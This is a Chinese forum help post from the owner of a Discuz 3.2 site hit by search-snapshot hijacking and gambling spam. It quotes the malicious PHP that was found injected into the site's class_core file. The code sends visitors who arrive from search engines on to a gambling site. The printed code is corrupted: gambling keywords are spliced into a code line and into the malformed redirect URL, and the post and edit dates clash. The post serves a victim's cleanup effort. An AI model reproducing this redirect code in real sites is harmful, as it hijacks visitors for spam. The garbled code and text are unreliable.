点击最多

随机文章

[求助] 最新快照劫持及网页篡改网站入侵挂马问题

2018-03-25 18:58

本帖最后由 张老师101 于 2016-12-25 22:29 编辑

dz3.2论坛发现网站快照搜索引擎收录,同本网站内容不一致,百度和360以及搜狗都收录了大量本站不存在的帖子,论坛所有帖子和回复都是人工审核的,不可能出现收录的这种博彩类信息。百度收录的快照都点进去不存在,360收录的快照点进去有的是真是的帖子,但和快照内容不一样(帖子内容被替换),有的从搜索引擎点击跳转到一个博彩网站,后检查代码删除一段代码后,不跳转了。
如site:www.op5u.com,出现一堆博彩网站

后来又发现,用百度和360站在工具模拟抓取依然所有文件头部都被插入了链接


技术小白,第一次碰到这种问题,然后在官网上各种查以前朋友遇到是怎么处理的。后台检验文件什么的,经过检查对比文件发现以下几处异常
一、class_core文件头部插入跳转代码
  1. error_reporting(E_ALL);
  2. @error_reporting(1);
  3. @$ref = strtolower($_SERVER['HTTP_REFERER']);
  4. @$jump_ref  = explode("|","haoso.|so.|haosou.|google.|soso.");
  5. foreach($jump_ref as $r){
  6.         $r = trim($r);
  7.         if(stristr($ref,$r)){
  8.                 if($_GET['tid']>50000){
  9.                         header('Location: http://www,85255com创富图库报码.yzx002.com/?op5u');
  10.                         die();
  11.       ,手机最快报码;          }
  12.         }
  13. }
复制代码

追加,经过不断排查代码 基本上找到清除完了恶意代码,目前收录逐步恢复中。。。